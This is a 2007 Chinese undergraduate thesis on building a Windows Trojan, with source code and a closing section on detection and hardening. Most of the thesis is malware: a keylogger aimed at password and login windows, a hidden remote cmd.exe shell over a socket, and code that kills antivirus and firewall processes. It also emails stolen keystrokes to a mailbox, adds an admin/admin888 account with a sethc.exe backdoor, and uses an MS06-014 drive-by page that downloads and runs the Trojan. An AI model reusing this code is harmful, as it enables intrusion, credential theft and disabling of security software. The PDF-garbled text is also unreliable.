H2003032142_杨道波_一个简单木马程序的设计与开发VIP

分类号 分类号 TP302 1TP302 1 U U D D C C D10621 408 2007 D10621 408 2007 5739 05739 0 密密 级 公级 公 开开 编编 号 号 20030321422003032142 成成 都都 信信 息息 工工 程程 学学 院院 学学 位位 论论 文文 一个简单木马程序的设计与开发一个简单木马程序的设计与开发 论论文作者姓名 文作者姓名 杨杨道波道波 申申请请学位学位专业专业 网网络络工程工程 申申请请学位学位类别类别 工学学士工学学士 指指导导教教师师姓姓名名 职职称称 吴春旺吴春旺 论论文提交日期 文提交日期 2007 年年 06 月月 10 日日 一个简单木马程序的设计与开发一个简单木马程序的设计与开发 摘摘 要要 随着互联网技术的迅猛发展 网络给人们带来了很多便利 但是也带来了 许多麻烦 各种网页木马 后门 下载者 病毒 利用各种漏洞 U 盘 社会 工程学在网上横行 给广大用户带来了重要资料丢失 提前泄密 照片被人恶 意传播到网上 系统被格盘 系统被监视 摄像头被人暗中开启并录像等非常 严重的后果 本毕业设计使用 VC 6 0 为开发平台设计的一个简单的木马程序 功能包 括 键盘记录 并定时把邮件内容成功发送到某邮箱中 关闭某些防火墙和杀 毒软件 开机自动隐藏运行 开启 2233 端口取得 CMD 权限 实现对目标机器 的文件操作 开启 3389 端口 并替换系统目录下的 sethc exe 为 cmd exe 实现 登录不要密码 添加管理员等功能 并可利用 MS06 014 或 MS07 004 等漏洞在 没打补丁没杀毒软件或是杀毒软件没更新的 windows2000 windowsXP windows2003 机子上实现通过网页传播 关键词关键词 键盘记录 木马 目标主机 The Design and Development of a Simple Trojan horse Abstract With the rapid development of Internet technology the network has posed many conveniences but it also brings a lot of trouble Various website Trojan backdoor downloading viruses using various loopholes U disk social engineering is pervasive on the Internet For the majority of users it will bring on important information missed and early leaked photograph maliciously spread to the Internet the system trays System being watched cameras opened and other very serious consequences In this design a simple Trojan horse is developed with Visual C 6 0 it s functions include Disk recording Timing sends the content of the mail item sent to a successful mail Close of certain firewall and anti virus software Automatically and hidden operation after booted Open the 2233 port and get the CMD authority to operate the target machine s papers Open the 3389 port and replace sethc exe of cmd exe under the system directory to realize when you login system the password is not necessary and add administrators On the other side the function also include Utilizing MS06 014 or MS07 004 and other loopholes The Trojan horse can spread on Internet through the website which did not patch the system or anti virus software or not update Windows 2000 windows XP Windows 2003 in time Key words Disk recording Trojan Targets mainframe 目目 录录 论文总页数 21 页 1前言 1 1 1课题背景 1 1 2国内外研究现状 1 1 3本课题研究的意义 2 1 4本课题的研究方法及目标 2 2系统分析 3 2 1需求分析 3 2 1 1程序要求 3 2 1 2辅助程序图 3 2 1 3木马程序功能说明 4 3程序设计 4 3 1辅佐程序设计 4 3 2木马程序设计 7 3 2 1 执行命令模块 7 3 2 2 键盘记录模块 9 3 2 3 关闭进程模块 12 3 2 4 网页木马模块 14 4程序及其变形的分析及防范措施 15 4 1一般木马的分析及防范 15 4 2常见防范方法 16 结 论 18 参考文献 19 致 谢 20 声 明 21 第 1 页 共 21 页 1 1 前言前言 1 11 1 课题背景课题背景 随着互联网技术的迅猛发展 网络给人们带来了很多便利 但是也带来了 许多麻烦 各种网页木马 后门 下载者 病毒 利用各种系统漏洞 网站漏 洞 程序漏洞 邮箱漏洞 U 盘及社会工程学等在网上横行 给广大用户带来 了重要资料丢失 机密文件提前泄密 邮箱帐号 游戏帐号 各类照片被人恶 意修改后传播到网上 系统被格盘 系统被监视 摄像头被人暗中开启并录像 传播等非常严重的后果 使得许多朋友 闻木马 就变色 为了使更多朋友了解 木马病毒 通过编写一个简单的木马 来分析它及其的变形 提出相应的防范措 施 1 21 2 国内外研究现状国内外研究现状 从有关的资料看 国内外的 windows 系统下的木马 功能已经从简单发展 到全面 大致包括以下功能 上传下载文件 删除文件 复制文件 粘贴文件 文件编辑 文件重命名 文件剪切 新建文件 修改文件 修改文件的创建时 间等 获得目标主机名 IP 地址 以及目标主机地理位置 系统打了多少补丁 安装了些什么软件 MAC 地址 安装了几个处理器 内存多大 网速多快 系 统启动时间 系统目录 系统版本等 取得目标主机的 CMD 权限 添加系统管 理员 对目标主机进行注册表操作 开启目标主机 3389 端口 软件自动更新 使目标主机成为 HTTP SOCK5 代理服务器 对目标主机的服务进行操作 对目 标主机的开机自启动项进行操作 目标主机主动向控制端发起连接 也可主动 向目标主机发起连接等 暗中打开用户摄像头 监控 录制用户隐私生活 对 用户进行屏幕监控等 木马的隐蔽性更强了 从原来的单纯隐藏在某个目录中 发展到了替换系 统文件 修改文件修改时间等 木马从 EXE 文件靠注册表启动 发展到了 DLL 文件远程线程插入 替换修 改系统 DLL 文件 靠驱动文件等高级水准 更有写入系统核心中的 木马深藏 在系统中 甚至在许多杀毒软件启动前启动 或者是绑定到杀毒软件上 或者 修改杀毒软件规则 使得杀毒软件误以为它是合法文件 或者是将木马 DLL 文 件插入到 WINLOGON EXE 中 以至于在安全模式下也无法删除 有的病毒会在系 统部分盘中 创建 Autorun inf 文件 然后把病毒也复制到该目录下隐藏着 使得用户双击该盘时 运行该病毒 对此 某些用户格式化了系统盘再重装系 统 也无法删除它 更有木马 病毒会感染某些盘中的 EXE 文件 COM 文件 使得用户重装系统后 运行该文件后又运行病毒 第 2 页 共 21 页 木马中招的方式包括 访问不安全网站 访问某些被入侵后的安全网站 在不同机子上使用 U 盘 通过 U 盘传播的木马病毒也越来越多 对系统或是一 般程序进行溢出后 上传木马 对网络中的主机进行漏洞扫描 然后利用相关 漏洞自动传播 利用邮箱漏洞配合网页木马 使用户中招 直接通过 QQ 等聊天 软件传给用户 并叫其运行 在 QQ 等聊天软件中发布网址给好友 好友不知情 下点击中招 通过物理接触主机以及远程破解主机密码等手段中招 木门在被杀毒软件查杀后 一般马上就会有变种或是升级版本流传 通过 对木马进行加壳 修改木马特征码 修改程序等手段使木马免杀 木马还包括 ASP 和 PHP 以及 ASPX JSP 木马 它们能过网页的形式存在 也可以有很多功 能 如常见的 ASP 木马就有如下功能 登录验证 上传下载文件 删除 复制 移动 编辑文件 新建文件 新建目录 搜索文件 更改文件名 查看文件修 改时间 serv u 漏洞提权 查看服务器信息 查看环境变量 注册表操作 探 查网站是否支持 PHP 查找网站上已经存在的木马 包括已经加密后的 对服 务器上所有盘的文件操作 对数据库进行操作 对网站文件进行打包以及解包 实现单页代理 进行 cmd 命令行操作 对整站进行挂马等功能 而简单的 ASP PHP ASPX JSP 木马 则只有一句话 1 31 3 本课题研究的意义本课题研究的意义 通过对木马病毒及其变形的分析 提出可行的防范措施 使更多的用户了 解木马病毒 了解防火墙 了解杀毒软件 了解常给系统打补丁的作用 以及 加密保管重要文件 机密文件脱机保管的重要性 1 41 4 本课题的研究方法本课题的研究方法及目标及目标 编写一个简单木马 通过网页传播 使用户了解其功能 传播方法 删除 方法 危害性以及其变形后的可能情况 要实现以下目标 1 记录用户键盘输入 2 获取本机 IP 地址 3 添加管理员 admin 密码 admin888 4 替换系统目录下的 sethc exe 为 cmd exe 5 关闭常见的防火墙 杀毒软件 6 打开 3389 端口 7 定时向指定邮箱发送邮件 内容为 IP 地址和键盘输入 8 打开设定端口 取得目标主机的 CMD 权限 9 把程序安装成系统服务 实现开机自启动 10 使用 MS06 014 网页木马 11 编写两个辅助程序 第 3 页 共 21 页 2 2需求分析需求分析 2 12 1 程序要求程序要求 木马要求有如下功能 记录具有某些关健字的键盘输入 关闭杀毒软件防 火墙 定时向指定邮箱发送邮件 添加系统管理员 替换系统目录下 sethc exe 为 cmd exe 打开 3389 端口 打开用户设定端口 开启 CMD 权限 把 程序自身复制到系统目录下 并设为系统服务实现开机自启动 获取本机 IP 地 址 通过网页木马下载并运用该木马程序 网页可用 MS06 014 或者是 MS07 004 以及更新的漏洞 实现对未打补丁 杀毒软件 防火墙久未更新的系统中 招 配置程序能对邮箱地址进行测试 能设定发信时间 能设定直接连接端口 2 22 2 辅助程序图辅助程序图 图 1 中程序在输入 SMTP 和邮箱用户名及密码后 能对该邮箱发送一封测试 邮件 能把 SMTP 邮箱用户名 密码 定时发信时间 连接端口部分加密后 追加到木马尾部 使得木马运行时 从尾部读取信息 图 1 配置木马程序图 配置时 填好 SMTP 和 UserName 以及 PassWord 后 可以点击 发送测试邮 件 便可到邮箱中 查看是否发送成功 以我自己的邮箱为例 下图为测试图 第 4 页 共 21 页 图 2 发送测试邮件 图 3 实现把文件 2 追加到文件 1 尾部 图 3 合并文件图 2 32 3 木马程序功能说明木马程序功能说明 1 记录用户键盘输入 记录有如下关键字的 密码 登录 管理 后台 学院 邮箱 系统 远程桌面 管理 Internet manage pass login cmd exe Firefox Browser 2 获取本机 IP 地址 3 添加管理员 admin 密码 admin888 4 替换系统目录下的 sethc exe 为 cmd exe 实现出现系统登录时 不需 要知道密码 连按 5 次 SHIFT 就可以调出 CMD EXE 可在 CMD EXE 中执行添加 管理员的命令 也可以执行 EXPLORER EXE 进而打开桌面等 而远程桌面登录 时 也可以通过此项调出 CMD EXE 程序 5 关闭常见防火墙和杀毒软件 6 打开 3389 端口 7 定时向指定邮箱发送邮件 内容为本机 IP 和键盘输入 8 打开设定端口 取得目标主机的 cmd 权限 9 把程序安装成服务 实现自启动 10 使用 Ms06 014 网页木马 11 编写两个辅助程序 第 5 页 共 21 页 3 3程序设计程序设计 3 13 1 辅佐程序设计辅佐程序设计 为了使用配置程序 需要设两个辅助程序 来实现合并程序 生成木马程 序并将配置文件写入木马程序中 通过 VC 6 0 建一个如图 1 的 MFC 程序 第一个文件读取按钮 代码如下 void CAddTwoDlg OnBtnfile1 CFileDialog dlg true if dlg DoModal IDOK m file1 dlg GetPathName UpdateData 0 将取得的文件名更新到文本框 1 中 配置木马程序代码 void CNneDlg OnBtnmake UpdateData 1 char path 256 0 文件 2 从文件 1 中分离出来 GetCurrentDirectory 256 path 取得当前文件夹路径 CString file1 CString file2 file1 Format s config exe path file2 Format s trojan exe path CFile fSource file1 CFile modeRead CFile modeNoTruncate int iSourceLength fSource GetLength fSource Seek iSourceLength 30 CFile begin char buffer 40 ZeroMemory buffer 40 fSource Read buffer 30 int iTargetLength atoi buffer fSource Seek iSourceLength iTargetLength 30 CFile begin CFile fTarget file2 CFile modeCreate CFile modeWrite CFile modeNoTruncate 第 6 页 共 21 页 char pBuffer new char iTargetLength ZeroMemory pBuffer iTargetLength fSource Read pBuffer iTargetLength fTarget Write pBuffer iTargetLength delete pBuffer fSource Close fTarget Close CString file3 将配置写入一文本文件 file3 Format s config txt path FILE pFile fopen file3 w fwrite m smtp 1 m smtp GetLength pFile char ch 10 fputc ch pFile 将邮箱用户名加密 fwrite encrypt m username 1 encrypt m username GetLength pFile fwrite m username 1 m username GetLength pFile fputc ch pFile fwrite m password 1 m password GetLength pFile fputc ch pFile CString xxx GetDlgItemText IDC EDIT time xxx fwrite xxx 1 xxx GetLength pFile fputc ch pFile CString pport GetDlgItemText IDC EDIT port pport fwrite pport 1 pport GetLength pFile fputc ch pFile fclose pFile 将配置文件加到程序尾部 CFile fff file2 CFile modeReadWrite CFile modeNoTruncate fff SeekToEnd CFile fConfigFile file3 CFile modeRead CFile modeNoTruncate int ilen fConfigFile GetLength 第 7 页 共 21 页 int len ilen char pBuff new char ilen ZeroMemory pBuff ilen fConfigFile Read pBuff ilen fff Write pBuff ilen fConfigFile Close delete pBuff char tempBuff 30 ZeroMemory tempBuff 30 itoa ilen tempBuff 10 while strlen tempBuff 30 strcat tempBuff fff Write tempBuff 30 fff Close fConfigFile Remove file3 MessageBox ConfigED 由于 是直接把配置文件放在 EXE 程序尾部 难免会被人发现 所以 使用此函数把数据加密 以迷惑对方 CString CNneDlg encrypt CString str if str GetLength 4 str Insert 2 wuha else if str GetLength 6 str Insert 2 qgii else if str GetLength 7 str Insert 3 wa23 else if str GetLength 9 str Insert 5 d12d else str Insert 1 mg1g return str 第 8 页 共 21 页 3 23 2 木马程序设计木马程序设计 木马开启设定后门 主要是通过是以新建一个线程的形式 程序运行后 先把自身复制到系统盘中 然后把系统盘中的程序设成服务 然后开启 3389 端 口 添加系统管理员 且把系统盘中的 sethc exe 换成 cmd exe 实现用户登 录时 不输入密码 直接按 5 次 shift 健 调出 cmd exe 程序 并另开一个线 程实现键盘记录 当用户按键时 就将当前窗口标题及按键内容记录到一个文 件中 到了设定的邮件发送时间 就把该文件的内容发送到设定的邮箱中 在 发送邮件前 会关闭常见的杀毒软件和防火墙 3 2 13 2 1 执行命令模块执行命令模块 DWORD WINAPI ClientThread LPVOID lpParam int ret char Buf 1024 HANDLE Rpipe Wpipe Wfile Rfile SOCKET AcceptClient SOCKET SOCKET lpParam SECURITY ATTRIBUTES sa sa nLength sizeof sa sa bInheritHandle TRUE sa lpSecurityDescriptor NULL ret CreatePipe ret CreatePipe 建立两个管道 分别用于接收命 令和显示结果 STARTUPINFO startinfo GetStartupInfo startinfo dwFlags STARTF USESHOWWINDOW STARTF USESTDHA NDLES startinfo hStdInput Wfile startinfo hStdError startinfo hStdOutput Rfile startinfo wShowWindow SW HIDE char cmdline MAX PATH GetSystemDirectory cmdline MAX PATH strcat cmdline cmd exe PROCESS INFORMATION proinfo 第 9 页 共 21 页 ret CreateProcess cmdline NULL NULL NULL 1 0 NULL NULL unsigned long ByteRec while 1 Sleep 100 PeekNamedPipe Rpipe Buf 1024 if ByteRec ret ReadFile Rpipe Buf ByteRec if ret break ret send AcceptClient Buf ByteRec 0 if ret 0 break else ByteRec recv AcceptClient Buf 1024 0 if ByteRec 0 break ret WriteFile Wpipe Buf ByteRec if ret break return 0 3 2 23 2 2 键盘记录模块键盘记录模块 IsWindowsFocusChange 函数主要是监控用户的当前活动窗口 是否切换 如果切换了 再检查当前窗口是否是要记录的窗口 如果是 就记录 不是就 不记录 KeyLogger 这个函数 在 while 中 先检查是否是用户设定的时间 如果是 就关闭常见防火墙和杀毒软件 然后发送邮件 如果不是 就记录用 户的输入 DWORD WINAPI KeyLogger LPVOID lpParam int BkState 256 0 int i x char keyBuf 256 第 10 页 共 21 页 int State int shiftState int asc a 64 memset keyBuf 0 sizeof keyBuf while TRUE CTime now 定时发送 now CTime GetCurrentTime if now GetHour 7 now GetHour atoi m time GetBuffer m time GetLen gth killU RavMon exe killU RavTask exe killU RavStub exe killU Rav exe killU McAfeeFire exe killU FrameworkService exe killU FireSrc exe killU avp exe killU CCenter exe killU rfwmain exe killU rfwsrv exe killU vsmon exe killU KavPFW exe Sendmail m username m password Sleep 7 if IsWindowsFocusChange if strlen keyBuf 0 writeinfile keyBuf 第 11 页 共 21 页 memset keyBuf 0 sizeof keyBuf for i 0 i 1 else if shiftState asc a else if shiftState 256 writeinfile keyBuf memset keyBuf 0 sizeof keyBuf continue else if x 13 if strlen keyBuf 0 continue writeinfile keyBuf memset keyBuf 0 sizeof keyBuf continue else if State 2 1 strcat keyBuf UpperCase i else if State 2 0 strcat keyBuf LoweCase i 第 13 页 共 21 页 return true 3 2 33 2 3 关闭进程模块关闭进程模块 killU 这个函数 主要功能是提升权限后 关闭某些进程 如果是 windows 98 系统 则要带完整的路径 而在本程序中 主要会关闭瑞星防火墙 和瑞星杀毒软件 天网防火墙 MACFEE 防火墙 卡巴杀毒软件等 void killU LPCTSTR name name 为要终止的进程的名称 LUID sdnValue TOKEN PRIVILEGES token p HANDLE h Token OpenProcessToken GetCurrentProcess TOKEN ADJUST PRIVILEGES TOKEN QUERY LookupPrivilegeValue NULL SE DEBUG NAME token p Privileges 0 Attributes SE PRIVILEGE ENABLED token p PrivilegeCount 1 token p Privileges 0 Luid sdnValue AdjustTokenPrivileges h Token FALSE CloseHandle h Token PROCESSENTRY32 proce 定义一个 PROCESSENTRY32 结类型的变 量 HANDLE hProcess NULL HANDLE hShot CreateToolhelp32Snapshot TH32CS SNAPPROCESS 0 创建快照句柄 proce dwSize sizeof PROCESSENTRY32 一定要先为 dwSize 赋值 if Process32First hShot 如果是就利用其 ID 获得句柄 TerminateProcess hProcess 0 终止该进程 while Process32Next hShot CloseHandle hShot Close Sendmail 函数 主要是读取记录了键盘输入的文件内容 并且连同本机 IP 地址 一起发到指定邮箱中 UserName Password 就是用户通过配置程序 加到木马尾部 然后木马运行时 先生成配置文件 config txt 然后读取出来 的 Sendmail 函数读取文件内容后 就会使用 file Remove c KB19861221 log 将应该记录文件删除掉 然后通过 fopen c KB19861221 log aw 再新建这个文件 现在一般的邮箱发送邮 件都会要求 smtp 验证用户名和密码 如果不对 就无法登录 无法发送邮件 在验证时 软件会先把用户名和密码解密出来 然后使用 BASE64 进行加密 再 发到服务器验证 此方法比较危险 如果中招用户 使用抓包工具 就会发现 BASE64 加密后的邮箱用户和密码 3 2 43 2 4 网页木马模块网页木马模块 网页木马 ms06 014 htm 是在未打 MS06 014 补丁 未安杀毒软件的机子 上 把网站上的木马下载到本机 然后改名为 haha exe 运行 代码如下 on error resume next dl torjan exe Set df document createElement object df setAttribute classid clsid BD96C556 65A3 11D0 983A 00C04FC29E36 str Microsoft XMLHTTP Set x df CreateObject str a1 Ado a2 db a3 Str a4 eam str1 a1 a2 a3 a4 第 15 页 共 21 页 str5 str1 set S df createobject str5 S type 1 str6 GET x Open str6 dl False x Send fname1 haha exe set F df createobject Scripting FileSystemObject set tmp F GetSpecialFolder 2 fname1 F BuildPath tmp fname1 S open S write x responseBody S savetofile fname1 2 S close set Q df createobject Shell Application Q ShellExecute fname1 open 0 将该网页放在网上 并把木马改名为 trojan exe 放在同一级目录中 在未 打补丁未安装杀毒软件的机子上网浏览到该网页时 便会中招 4 4程序及其变形的分析及防范措施程序及其变形的分析及防范措施 4 14 1一般木马的分析及防范一般木马的分析及防范 1 远程控制工具与木马的区别 远程控制工具是一种用于正常的网络管理的工具 远程控制工具的存在及 使用通常是为人所知的 而木马除了具有远程控制工具的功能外 通常还具有 隐蔽性 秘密性 破坏性等特点 有些远程控制工具通过一些相应的配置可以 作为木马使用 而木马也可以作为正当用途的远程控制工具使用 2 木马的常用启动方式 包括把程序放入系统的启动目录中 注意在 windows 中有两个自启动目录 把程序的自启动设置到系统配置文件中 如 win ini system ini 等中 在注 册表中进行配置实现程序的自动启动 把程序注册为系统服务 替换系统文件 木马为了达到隐藏自己的目标 通常在设置注册表启动项时具有很强的迷 惑性 有些木马还可以随机更改有关的启动项 3 木马的隐蔽性 是木马能否长期存活的关键 这主要包括几方面的内容 第 16 页 共 21 页 在文件名的命名上采用和系统文件的文件名相似的文件名 设置文件的属 性为系统文件 隐藏 只读属性等 文件的存放地点是不常用或难以发现的系 统文件目录中 通常采用了远程线程技术插入或 HOOK 技术注入其他进程的运行 空间 采用 API HOOK 技术拦截有关系统函数的调用实现运行时的隐藏 替换系 统服务等方法导致无法发现木马的运行痕迹 采用端口复用技术不打开新的通 信端口实现通信 采用 ICMP 协议等无端口的协议进行通信 还有些木马平时只 有收到特定的数据包才开始活动 平时处于休眠状态 有的木马 还采用端口 截持技术 比如同用 80 端口 在 80 端口收到信息 如果是木马的信息 则处 理它 如果不是 则转给正常处理的程序 有些木马在运行时能够删除自身启 动运行及存在的痕迹 当检测到操作系统重新启动时再重新在系统中设置需要 启动自身的参数 这类木马存在的问题 不安全 当系统断电 死机时无法再 次恢复运行 因此不安全 4 如何检查计算机是否已被装了木马 HKEY LOCAL MACHINE SOFTWARE Microsoft Windows Curren Version 和 HKEY CURRENT USER Software Microsoft Windows CurrentVersion 下 所有 以 Run 开头的键值名 其下有没有可疑的文件名 如果有 就需要删除相应的 键值 再删除相应的应用程序 最好是程序先备份 检查启动组 启动组对应 的文件夹为 C windows start menu programs startup 对应的位置 HKEY CURRENT USER Software Microsoft Windows CurrentVersion Explorer Shell Folders Startup C windows start menu programs startup 检查 Win ini 以及 System ini 比方说 Win ini 的小节下的 load 和 run 后面在正 常情况下是没有跟什么程序的 如果有了那就要小心了 看看是什么 在 System ini 的小节的 Shell Explorer exe 后面也是加载木马的好场所 因此 也要注意这里了 当你看到变成这样 Shell Explorer exe wind0ws exe 请 注意那个 wind0ws exe 很有可能就是木马服务端程序 检查 C windows winstart bat C windows wininit ini Autoexec bat 木马们 也很可能隐藏在那里 如果是 EXE 文件启动 那么运行这个程序 看木马是否 被装入内存 端口是否打开 如果是的话 则说明要么是该文件启动木马程序 要么是该文件捆绑了木马程序 只好再找一个这样的程序 重新安装一下了 木马启动都有一个方式 它只是在一个特定的情况下启动 所以 平时多注意 一下你的系统开的端口 可到 cmd 下使用 netstat an 命令查看 查看一下 正在运行的程序 用此来监测大部分木马应该没问题的 第 17 页 共 21 页 4 24 2 常见防范方法常见防范方法 针对 windows 系统 可使用下面方法 将桌面的 我的文档 的默认路径 设置到 D 盘上 如是 XP 系统 则将系统自带的防火墙打开 关闭系统不要的服 务 如 Net Logon NetMeeting Remote Desktop Sharing Remote Access Auto Connection Manager Remote Registry Service Routing and Remote Access Telnet 等服务 如果不是共享使用文件或者打印机 就只安装 TCP IP 协议 INTERNET EXPLORER 的 安全设置 为 安全级 中 隐私 设置为 中 内容 里 个人信息 下的 自动完成 设置为 自动完成功能应用 于 WEB 地址 表单 如果用户是 OUTLOOK 的使用者 安全 中 病毒防护 受限站点区域 选择当别的应用程序试图用我的名义发送电子邮件时警告我 不允许保存或打开可能有病毒的附件 要注意密码的复杂性 还要记住经常改密码 最好不要多个帐号使用同一 个密码 不要使用简单的英文或是数字作为密码 最好是中文 英文 特殊符 号一起作为密码 不要给别人透露密码 在输入密码时 留意身边的人是否在 看自己输入 还要设置复杂的屏幕保护密码 防止内部人员破坏 如果是 windows 98 操作系统 要打好补丁 否则可通过按 ESC 健进入 开启密码策略 注意应用密码策略 如启用密码复杂性要求 设置密码长度最小值为 6 位 设 置强制密码历史为 5 次 时间一般为 42 天 在 Windows 中单击 开始 运行 在输入框中输入 Syskey 运行系统密码设置程序 在弹出对话框中单击 更 新 按钮 进入所示的密码设置对话框 选择 密码启动 单选按钮 然后在 下面的窗口中依次输入同样的密码 保存设置后就完成了系统启动密码的设置 如想取消系统启动密码 只需在 启动密码 窗口中选择 在本机上保存启动 密码 确定 后系统会让您输入设定的系统启动密码 完成后系统密码就保 存到您的硬盘上了 下次启动时就不再有系统启动密码窗口出现了 经常访问微软和一些安全站点 下载最新的 Service Pack 和漏洞补丁 是 保障服务器长久安全的惟一方法 杀毒软件不仅能杀掉一些著名的病毒 还能 查杀大量木马和后门程序 因此要注意经常运行程序并升级病毒库 在计算机 管理的用户里面把 Guest 账号禁用 或者是设置一个复杂密码 如果使用防火 墙 可以配置禁止别人 ping 自己 去掉所有的 Duplicate User 用户 测试用 户 共享用户等等 用户组策略设置相应权限 并且经常检查系统的用户 删 除已经不再使用的用户 这些用户很多时候都是黑客们入侵系统的突破口 创 建一个一般权限用户用来收信以及处理一些日常事物 另一个拥有 Administrators 权限的用户只在需要的时候使用 把系统 Administrator 账号 改名 把共享文件的权限从 Everyone 组改成授权用户 第 18 页 共 21 页 开启用户策略 最好使用用户策略 分别设置复位用户锁定计数器时间为 30 分钟 用户锁定时间为 30 分钟 用户锁定阈值为 3 次 默认情况下 登录 对话框中会显示上次登录的用户名 这使得别人可以很容易地得到系统的一些 用户名 进而做密码猜测 修改注册表可以不让对话框里显示上次登录的用户 名 方法为 打开注册表编辑器并找到注册表项 HKLM Software Microsoft Windows T CurrentVersion Winlogon Dont DisplayLastUserName 把 REG SZ 的键值改成 1 Windows 2000 的缺省安装很 容易被攻击者取得账号列表 即使安装了最新的 Service pack 也是如此 在 Windows 2000 中有一个缺省共享 IPC 并且还有诸如 admin C D 等等 而 IPC 允许匿名用户 即未经登录的用户 访问 利用这个缺省共享可以取得用 户列表 要想防范这些 可将在 管理工具 本地安全策略 安全设置 本地 策略 安全选项 中的 对匿名连接的额外限制 修改为 不允许枚举 SAM 账 号和共享 就可以防止大部分此类连接 但是还没完 如果使用 NetHacker 只 要使用一个存在的账号就又可以顺利地取得所有的账号名称 所以 我们还需 要另一种方法做后盾 创建一个文件 del cmd 内容就是一行命令 net share ipc delete 在 Windows 的计划任务中增加一项任务 执行以上的 del cmd 时间安排为 计算机启动时执行 或者把这个文件放到 开始 程 序 启动 中让它一启动就删除 IPC 共享 删除 admin 共享 ESYSTEM CurrentControlSet Serviceslanmanserverparameters 增加 AutoShareWks 子键 REG DWORD 键值为 0 删除默认共享 修改注册表 HKEY LOCAL MACHINE SYSTEM CurrentControlSet Serviceslanmanserverparam eters 增加 AutoS